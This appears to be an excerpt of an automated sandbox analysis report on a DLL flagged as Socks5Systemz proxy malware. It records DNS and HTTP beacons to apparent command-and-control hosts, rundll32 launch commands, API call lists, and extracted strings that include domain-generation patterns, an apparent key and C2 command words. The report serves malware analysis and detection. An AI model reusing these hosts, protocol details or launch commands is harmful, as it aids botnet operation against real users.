Dec 15, 2024 00:49:10.509433985 CET	192.168.2.4	45.155.250.90	0x4288	Standard query (0)	gjeqiox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 15, 2024 00:48:18.841063023 CET	45.155.250.90	192.168.2.4	0x2dfe	No error (0)	eeikzox.ua		94.232.249.187	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:49:10.759042978 CET	45.155.250.90	192.168.2.4	0x4288	No error (0)	gjeqiox.com		185.237.206.129	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

eeikzox.ua

gjeqiox.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49759	94.232.249.187	80	7584	C:\Windows\System32\loaddll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:48:19.011759043 CET	287	OUT	GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1 Host: eeikzox.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49787	94.232.249.187	80	7584	C:\Windows\System32\loaddll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:48:32.301275015 CET	287	OUT	GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1 Host: eeikzox.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49817	94.232.249.187	80	7584	C:\Windows\System32\loaddll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:48:45.441265106 CET	287	OUT	GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1 Host: eeikzox.ua User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49874	185.237.206.129	80	7584	C:\Windows\System32\loaddll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:49:10.881289959 CET	288	OUT	GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1 Host: gjeqiox.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:49:12.194669962 CET	1120	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:49:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 33 39 30 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 32 61 34 35 39 33 35 66 62 30 61 34 38 39 65 34 61 30 39 63 35 66 62 61 35 39 37 61 66 65 61 36 38 38 63 33 66 30 66 33 66 31 63 39 36 39 32 30 39 64 30 34 61 35 37 39 64 30 61 64 33 30 33 38 37 31 31 61 38 62 66 66 34 34 66 39 62 34 38 39 36 33 66 30 31 38 64 32 66 38 30 35 39 38 36 39 61 33 61 32 38 36 64 34 33 61 32 32 31 32 62 37 30 63 32 39 35 37 39 32 61 38 65 39 37 64 61 33 37 35 33 34 63 38 36 64 62 30 63 66 38 31 31 63 65 64 39 35 37 62 32 32 37 33 39 30 31 35 36 63 62 35 66 33 66 64 39 35 61 66 65 32 32 38 37 34 37 34 64 61 62 32 64 65 61 61 35 31 31 39 31 35 62 35 64 62 63 62 36 61 62 38 38 65 39 64 36 61 33 34 62 65 31 66 62 62 65 39 32 64 65 32 36 33 39 38 32 31 65 62 63 33 33 65 62 36 66 31 38 61 38 62 38 36 30 61 65 30 34 63 31 62 36 37 38 39 30 31 65 61 65 63 62 39 32 33 38 34 32 39 64 62 39 64 32 33 32 39 64 65 33 38 30 66 65 31 61 66 39 34 31 63 30 35 32 32 36 63 36 32 30 61 66 39 32 32 [TRUNCATED] Data Ascii: 390de2ffe912c1a5259eb23643d6c02a45935fb0a489e4a09c5fba597afea688c3f0f3f1c969209d04a579d0ad3038711a8bff44f9b48963f018d2f8059869a3a286d43a2212b70c295792a8e97da37534c86db0cf811ced957b227390156cb5f3fd95afe2287474dab2deaa511915b5dbcb6ab88e9d6a34be1fbbe92de2639821ebc33eb6f18a8b860ae04c1b678901eaecb9238429db9d2329de380fe1af941c05226c620af9225c3710c4f4f8ddcf1dbf27278493f3bb766ffb9222d3da3c77c793a1cff9e605e55a34dbea7fbd03f3f181e2a5bdb06d1420d55f60e073e80f1c07c8c83dc89075636c7b0436ff8fb745194e8568518fc09469d27ccf2a22456ec67cf613868a94af4f5d81a2506c3be88ddc9ed4f78de501d870629d7258cc37f135664174a81c2019fce96266489dac33c7101ba2151dcdf294e1b1ab90be7ed675f8043efe90414b7a7f7754a155793506ebcf6a0d9c11ea1760ca034e51f66007845d855c7e01226955272ecc5ca8ce526d1e53f3a17ad6513aa1c1a93e9af12e9dba705d9b98be9b96415f8d7bbde792c2371a97d9e80572d9b4d862e06fe1f69e072144da477d671a19d9996c1d51a78b58b9aac244550fc613cfae58023e0ae9a91677c280
Dec 15, 2024 00:49:15.664921999 CET	296	OUT	GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1 Host: gjeqiox.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:49:16.187566042 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:49:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50013	185.237.206.129	80	7584	C:\Windows\System32\loaddll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:50:16.316783905 CET	296	OUT	GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1 Host: gjeqiox.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:50:17.587385893 CET	976	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:50:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 33 30 30 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 63 30 65 35 35 38 32 34 65 30 66 64 62 65 37 61 36 39 31 62 39 61 35 32 62 63 65 36 64 36 31 37 63 35 62 63 66 64 64 35 33 64 63 34 38 35 66 63 62 34 39 38 39 35 61 65 61 34 31 66 36 62 62 66 36 34 34 39 39 35 36 39 37 33 39 30 61 39 32 32 66 38 35 34 37 39 61 39 63 33 66 33 63 36 65 34 36 61 31 33 66 32 34 37 37 63 39 39 32 36 37 32 64 38 38 38 32 64 61 33 36 35 66 34 63 38 65 64 33 30 37 65 37 31 30 63 39 63 37 35 64 62 33 32 66 33 35 31 65 35 34 63 62 35 63 32 61 64 61 35 63 66 38 32 32 38 32 34 61 34 36 62 30 32 63 65 64 62 62 31 62 39 30 35 30 35 32 61 33 62 37 61 33 38 39 66 63 64 36 61 35 35 36 66 65 66 61 62 30 39 61 63 31 32 37 33 39 38 35 30 62 62 63 33 39 65 64 37 62 31 38 61 30 62 39 37 65 61 34 30 32 64 62 62 35 36 36 39 39 31 37 61 64 64 35 39 30 33 39 34 62 38 32 62 39 64 33 32 39 39 36 65 35 38 32 65 30 31 62 66 32 34 66 64 62 34 64 32 64 63 33 33 34 61 66 39 36 32 [TRUNCATED] Data Ascii: 300de2fe88e261d4749b96478393969f80739fc0e55824e0fdbe7a691b9a52bce6d617c5bcfdd53dc485fcb49895aea41f6bbf644995697390a922f85479a9c3f3c6e46a13f2477c992672d8882da365f4c8ed307e710c9c75db32f351e54cb5c2ada5cf822824a46b02cedbb1b905052a3b7a389fcd6a556fefab09ac12739850bbc39ed7b18a0b97ea402dbb5669917add590394b82b9d32996e582e01bf24fdb4d2dc334af9620dd7809424792ddf2d9e7777155203eb47df7ba20333ea8c47a67381aea9e635355a74aa9a9fbce3e3914132345da02db540d49f61006208bf4c1628d8cd8840b4830c4a54166f8f8715380ed509b19f30b418325c7f1ba274ee87cd0643e62b348f4f0d91f2d18c1b68cc4c5f55379c45e18990722de298bdd7a1d40600a4b9bc31f9bc393386189dbc03b791fb3284bc6de32470510b708f9ec6b5f8f58eeed0c09b7bef36a4b0b5c945770beffafd7dc1fa47e19a338e61f66037151db56d9e21b248b5073e3d3c997e339d4f93b3511b3641bab181296c70

Target ID:	0
Start time:	18:47:17
Start date:	14/12/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll"
Imagebase:	0x410000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	18:47:17
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	18:47:17
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:47:17
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
Imagebase:	0xb50000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:47:17
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892
Imagebase:	0x410000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	109

Executed Functions

Function 6CEB68FD Relevance: 240.1, APIs: 86, Strings: 50, Instructions: 2069memorynetworksleepCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6929
GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 6CEB6939
GetProcAddress.KERNEL32(00000000), ref: 6CEB6940
GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 6CEB6956
GetProcAddress.KERNEL32(00000000), ref: 6CEB695D
GetTickCount.KERNEL32 ref: 6CEB6974
GetVersionExA.KERNEL32(6CEF1010), ref: 6CEB698E
_malloc.LIBCMT ref: 6CEB69B8

Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F

_malloc.LIBCMT ref: 6CEB69CF
_malloc.LIBCMT ref: 6CEB69DD
_malloc.LIBCMT ref: 6CEB69EE
_malloc.LIBCMT ref: 6CEB69FF
_malloc.LIBCMT ref: 6CEB6A0D
_malloc.LIBCMT ref: 6CEB6A1E
_malloc.LIBCMT ref: 6CEB6A2C
GetProcessHeap.KERNEL32(00000000,00000400), ref: 6CEB6A3C
HeapAlloc.KERNEL32(00000000), ref: 6CEB6A43
GetProcessHeap.KERNEL32(00000000,00000400), ref: 6CEB6A53
HeapAlloc.KERNEL32(00000000), ref: 6CEB6A5A
GetProcessHeap.KERNEL32(00000000,00000400), ref: 6CEB6A6D
HeapAlloc.KERNEL32(00000000), ref: 6CEB6A74
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6AC1
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6AD2
_malloc.LIBCMT ref: 6CEB6B55
_malloc.LIBCMT ref: 6CEB6B66
_malloc.LIBCMT ref: 6CEB6B77
_malloc.LIBCMT ref: 6CEB6B98
QueryPerformanceCounter.KERNEL32(6CEF13F0), ref: 6CEB6BA9
Sleep.KERNELBASE(6F94537B), ref: 6CEB6BBA
_malloc.LIBCMT ref: 6CEB6BE1
_malloc.LIBCMT ref: 6CEB6BEF
Sleep.KERNELBASE(00001388), ref: 6CEB6C32
Sleep.KERNELBASE(0000EA60), ref: 6CEB6C47
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6C52
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB6C68
GetTickCount.KERNEL32 ref: 6CEB6E19
wsprintfA.USER32 ref: 6CEB6F3C
wsprintfA.USER32 ref: 6CEB6FA9
wsprintfA.USER32 ref: 6CEB7016
wsprintfA.USER32 ref: 6CEB70ED
wsprintfA.USER32 ref: 6CEB71A1
wsprintfA.USER32 ref: 6CEB720E
wsprintfA.USER32 ref: 6CEB73BF
wsprintfA.USER32 ref: 6CEB7466
wsprintfA.USER32 ref: 6CEB74D3
wsprintfA.USER32 ref: 6CEB7617
wsprintfA.USER32 ref: 6CEB76BE
wsprintfA.USER32 ref: 6CEB772B
wsprintfA.USER32 ref: 6CEB7798
wsprintfA.USER32 ref: 6CEB7805
wsprintfA.USER32 ref: 6CEB786F
wsprintfA.USER32 ref: 6CEB7916
wsprintfA.USER32 ref: 6CEB7983
wsprintfA.USER32 ref: 6CEB79F0
wsprintfA.USER32 ref: 6CEB7A5D
wsprintfA.USER32 ref: 6CEB7AC7
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 6CEB7CC9
InternetSetOptionA.WININET(00000000,00000002,00001388,00000004), ref: 6CEB7CF4
InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 6CEB7D12
InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 6CEB7D30
InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 6CEB7D68
InternetReadFile.WININET(00000000,00000000,00001000,?), ref: 6CEB7D96
InternetCloseHandle.WININET(00000000), ref: 6CEB7DC3
InternetCloseHandle.WININET(00000000), ref: 6CEB7DCC
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7E5A
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7E70
_malloc.LIBCMT ref: 6CEB7F06
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7F14
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB7F28
_malloc.LIBCMT ref: 6CEB801D
_strtok.LIBCMT ref: 6CEB806B
_swscanf.LIBCMT ref: 6CEB809A
_strtok.LIBCMT ref: 6CEB80BB
_free.LIBCMT ref: 6CEB80D0
Sleep.KERNELBASE(000007D0,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CEB8281
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB82E3
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB82F4

Part of subcall function 6CEB4E8E: _memmove.LIBCMT ref: 6CEB4F86

_sprintf.LIBCMT ref: 6CEB8395

Part of subcall function 6CEB468E: htons.WS2_32(?), ref: 6CEB46B2
Part of subcall function 6CEB468E: htonl.WS2_32(00000000), ref: 6CEB46C9
Part of subcall function 6CEB468E: htonl.WS2_32(00000000), ref: 6CEB46D0

_malloc.LIBCMT ref: 6CEB86D4
_free.LIBCMT ref: 6CEB8721

Strings

d%c%c%c%c%c%c.info, xrefs: 6CEB707B
disconnect, xrefs: 6CEB7E89, 6CEB82AE
k%c%c%c%c%c%c%d.ua, xrefs: 6CEB73B7
ntdll.dll, xrefs: 6CEB6934, 6CEB6951
<htm, xrefs: 6CEB7DF0
g%c%c%c%c%c%c.com, xrefs: 6CEB7206
y%c%c%c%c%c%c.info, xrefs: 6CEB7A55
q%c%c%c%c%c%c.ru, xrefs: 6CEB76B6
Host: %s, xrefs: 6CEB7B0A
auth_swith, xrefs: 6CEB7FC1
dl, xrefs: 6CEB7E3C
abcdefghijklmnopqrstuvwxyzeioubd, xrefs: 6CEB6EE6, 6CEB6EEB
w%c%c%c%c%c%c.com, xrefs: 6CEB797B
/fox.php?c=, xrefs: 6CEB7BE6
f%c%c%c%c%c%c.ru, xrefs: 6CEB7199
b%c%c%c%c%c%c.com, xrefs: 6CEB6FA1
i4hiea56#7b&dfw3, xrefs: 6CEB6B01, 6CEB6D8D, 6CEB7E07
o%c%c%c%c%c%c.info, xrefs: 6CEB75A5
p%c%c%c%c%c%c.ua, xrefs: 6CEB760F
h%c%c%c%c%c%c.net, xrefs: 6CEB7273
e%c%c%c%c%c%c.ua, xrefs: 6CEB70E5
updips, xrefs: 6CEB7EAF, 6CEB8337
t%c%c%c%c%c%c.info, xrefs: 6CEB77FD
idle, xrefs: 6CEB7E9C, 6CEB8309
u%c%c%c%c%c%c.ua, xrefs: 6CEB7867
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 6CEB6C71
strcat, xrefs: 6CEB694C
s%c%c%c%c%c%c.net, xrefs: 6CEB7790
urls, xrefs: 6CEB86FB
http://, xrefs: 6CEB7B21
c%c%c%c%c%c%c.net, xrefs: 6CEB700E
x%c%c%c%c%c%c.net, xrefs: 6CEB79E8
connect, xrefs: 6CEB7E76, 6CEB7EE0
client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 6CEB6B86
v%c%c%c%c%c%c.ru, xrefs: 6CEB790E
z%c%c%c%c%c%c.ua, xrefs: 6CEB7ABF
l%c%c%c%c%c%c.ru, xrefs: 6CEB745E
n%c%c%c%c%c%c.net, xrefs: 6CEB7538
a%c%c%c%c%c%c.ru, xrefs: 6CEB6F34
, xrefs: 6CEB85F1
s, xrefs: 6CEB6AFA
sprintf, xrefs: 6CEB692F
j%c%c%c%c%c%c.info, xrefs: 6CEB734D
updurls, xrefs: 6CEB7EC2, 6CEB86BC
block, xrefs: 6CEB804B
m%c%c%c%c%c%c.com, xrefs: 6CEB74CB
i%c%c%c%c%c%c.info, xrefs: 6CEB72E0
%d;, xrefs: 6CEB8389
r%c%c%c%c%c%c.com, xrefs: 6CEB7723
auth_ip, xrefs: 6CEB7FFF, 6CEB836B

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: wsprintf$_malloc$CriticalSection$Internet$Heap$EnterLeave$HandleSleep$AllocOptionProcess$AddressCloseCountModuleOpenProcTick_free_strtokhtonl$AllocateCounterFileInitializePerformanceQueryReadVersion_memmove_sprintf_swscanfhtons
String ID: $%d;$/fox.php?c=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$abcdefghijklmnopqrstuvwxyzeioubd$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c%d.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua$dl
API String ID: 1836220982-2750600800
Opcode ID: 0b3594e623d70fc39851ff022c0ccb5e656e04869fd1d59299c1e9f40f30c2ef
Instruction ID: b736b07fe67f9cd1580e9e75e2773f08089cc8ac9c72a462bbf31c7448ad69c3
Opcode Fuzzy Hash: 0b3594e623d70fc39851ff022c0ccb5e656e04869fd1d59299c1e9f40f30c2ef
Instruction Fuzzy Hash: 0C13A17290416C9FDF51DBACCD41BEEBBB8AB09304F240495F569FBA52CA349A81CF10

Function 6CEC8107 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 6CEC811D
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 6CEC8136
GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 6CEC815B
FreeLibrary.KERNEL32(00000000), ref: 6CEC81E4

Strings

GetAdaptersInfo, xrefs: 6CEC8130
iphlpapi.dll, xrefs: 6CEC8111

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
